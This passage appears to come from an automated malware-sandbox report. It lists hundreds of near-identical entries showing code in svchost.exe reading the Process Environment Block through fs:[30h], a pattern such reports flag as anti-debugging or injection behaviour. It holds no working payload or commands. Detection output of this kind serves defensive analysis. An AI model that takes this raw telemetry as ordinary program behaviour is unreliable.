                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA250 mov eax, dword ptr fs:[00000030h]1_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362823B mov eax, dword ptr fs:[00000030h]1_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402E1 mov eax, dword ptr fs:[00000030h]1_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A2C3 mov eax, dword ptr fs:[00000030h]1_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037062D6 mov eax, dword ptr fs:[00000030h]1_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036402A0 mov eax, dword ptr fs:[00000030h]1_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov ecx, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C62A0 mov eax, dword ptr fs:[00000030h]1_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E284 mov eax, dword ptr fs:[00000030h]1_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0283 mov eax, dword ptr fs:[00000030h]1_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704164 mov eax, dword ptr fs:[00000030h]1_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov ecx, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C4144 mov eax, dword ptr fs:[00000030h]1_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C156 mov eax, dword ptr fs:[00000030h]1_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C8158 mov eax, dword ptr fs:[00000030h]1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636154 mov eax, dword ptr fs:[00000030h]1_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660124 mov eax, dword ptr fs:[00000030h]1_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov eax, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DE10E mov ecx, dword ptr fs:[00000030h]1_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov ecx, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DA118 mov eax, dword ptr fs:[00000030h]1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F0115 mov eax, dword ptr fs:[00000030h]1_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037061E5 mov eax, dword ptr fs:[00000030h]1_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036601F8 mov eax, dword ptr fs:[00000030h]1_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F61C3 mov eax, dword ptr fs:[00000030h]1_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE1D0 mov eax, dword ptr fs:[00000030h]1_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03670185 mov eax, dword ptr fs:[00000030h]1_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EC188 mov eax, dword ptr fs:[00000030h]1_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4180 mov eax, dword ptr fs:[00000030h]1_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B019F mov eax, dword ptr fs:[00000030h]1_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A197 mov eax, dword ptr fs:[00000030h]1_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365C073 mov eax, dword ptr fs:[00000030h]1_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632050 mov eax, dword ptr fs:[00000030h]1_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B6050 mov eax, dword ptr fs:[00000030h]1_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A020 mov eax, dword ptr fs:[00000030h]1_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C020 mov eax, dword ptr fs:[00000030h]1_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6030 mov eax, dword ptr fs:[00000030h]1_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4000 mov ecx, dword ptr fs:[00000030h]1_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D2000 mov eax, dword ptr fs:[00000030h]1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E016 mov eax, dword ptr fs:[00000030h]1_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036380E9 mov eax, dword ptr fs:[00000030h]1_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B60E0 mov eax, dword ptr fs:[00000030h]1_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362C0F0 mov eax, dword ptr fs:[00000030h]1_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036720F0 mov ecx, dword ptr fs:[00000030h]1_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B20DE mov eax, dword ptr fs:[00000030h]1_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036280A0 mov eax, dword ptr fs:[00000030h]1_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C80A8 mov eax, dword ptr fs:[00000030h]1_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov eax, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F60B8 mov ecx, dword ptr fs:[00000030h]1_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363208A mov eax, dword ptr fs:[00000030h]1_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638770 mov eax, dword ptr fs:[00000030h]1_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640770 mov eax, dword ptr fs:[00000030h]1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov esi, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366674D mov eax, dword ptr fs:[00000030h]1_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630750 mov eax, dword ptr fs:[00000030h]1_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE75D mov eax, dword ptr fs:[00000030h]1_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672750 mov eax, dword ptr fs:[00000030h]1_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B4755 mov eax, dword ptr fs:[00000030h]1_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C720 mov eax, dword ptr fs:[00000030h]1_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov ecx, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366273C mov eax, dword ptr fs:[00000030h]1_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AC730 mov eax, dword ptr fs:[00000030h]1_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C700 mov eax, dword ptr fs:[00000030h]1_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630710 mov eax, dword ptr fs:[00000030h]1_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660710 mov eax, dword ptr fs:[00000030h]1_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036527ED mov eax, dword ptr fs:[00000030h]1_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE7E1 mov eax, dword ptr fs:[00000030h]1_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036347FB mov eax, dword ptr fs:[00000030h]1_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363C7C0 mov eax, dword ptr fs:[00000030h]1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B07C3 mov eax, dword ptr fs:[00000030h]1_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036307AF mov eax, dword ptr fs:[00000030h]1_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E47A0 mov eax, dword ptr fs:[00000030h]1_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D678E mov eax, dword ptr fs:[00000030h]1_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F866E mov eax, dword ptr fs:[00000030h]1_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A660 mov eax, dword ptr fs:[00000030h]1_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03662674 mov eax, dword ptr fs:[00000030h]1_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364C640 mov eax, dword ptr fs:[00000030h]1_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364E627 mov eax, dword ptr fs:[00000030h]1_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03666620 mov eax, dword ptr fs:[00000030h]1_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668620 mov eax, dword ptr fs:[00000030h]1_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363262C mov eax, dword ptr fs:[00000030h]1_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE609 mov eax, dword ptr fs:[00000030h]1_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364260B mov eax, dword ptr fs:[00000030h]1_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672619 mov eax, dword ptr fs:[00000030h]1_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE6F2 mov eax, dword ptr fs:[00000030h]1_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B06F1 mov eax, dword ptr fs:[00000030h]1_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A6C7 mov eax, dword ptr fs:[00000030h]1_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C6A6 mov eax, dword ptr fs:[00000030h]1_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036666B0 mov eax, dword ptr fs:[00000030h]1_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634690 mov eax, dword ptr fs:[00000030h]1_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366656A mov eax, dword ptr fs:[00000030h]1_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638550 mov eax, dword ptr fs:[00000030h]1_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640535 mov eax, dword ptr fs:[00000030h]1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E53E mov eax, dword ptr fs:[00000030h]1_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6500 mov eax, dword ptr fs:[00000030h]1_2_036C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704500 mov eax, dword ptr fs:[00000030h]1_2_03704500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365E5E7 mov eax, dword ptr fs:[00000030h]1_2_0365E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036325E0 mov eax, dword ptr fs:[00000030h]1_2_036325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366C5ED mov eax, dword ptr fs:[00000030h]1_2_0366C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E5CF mov eax, dword ptr fs:[00000030h]1_2_0366E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036365D0 mov eax, dword ptr fs:[00000030h]1_2_036365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366A5D0 mov eax, dword ptr fs:[00000030h]1_2_0366A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B05A7 mov eax, dword ptr fs:[00000030h]1_2_036B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036545B1 mov eax, dword ptr fs:[00000030h]1_2_036545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov eax, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03632582 mov ecx, dword ptr fs:[00000030h]1_2_03632582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664588 mov eax, dword ptr fs:[00000030h]1_2_03664588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366E59C mov eax, dword ptr fs:[00000030h]1_2_0366E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC460 mov ecx, dword ptr fs:[00000030h]1_2_036BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365A470 mov eax, dword ptr fs:[00000030h]1_2_0365A470
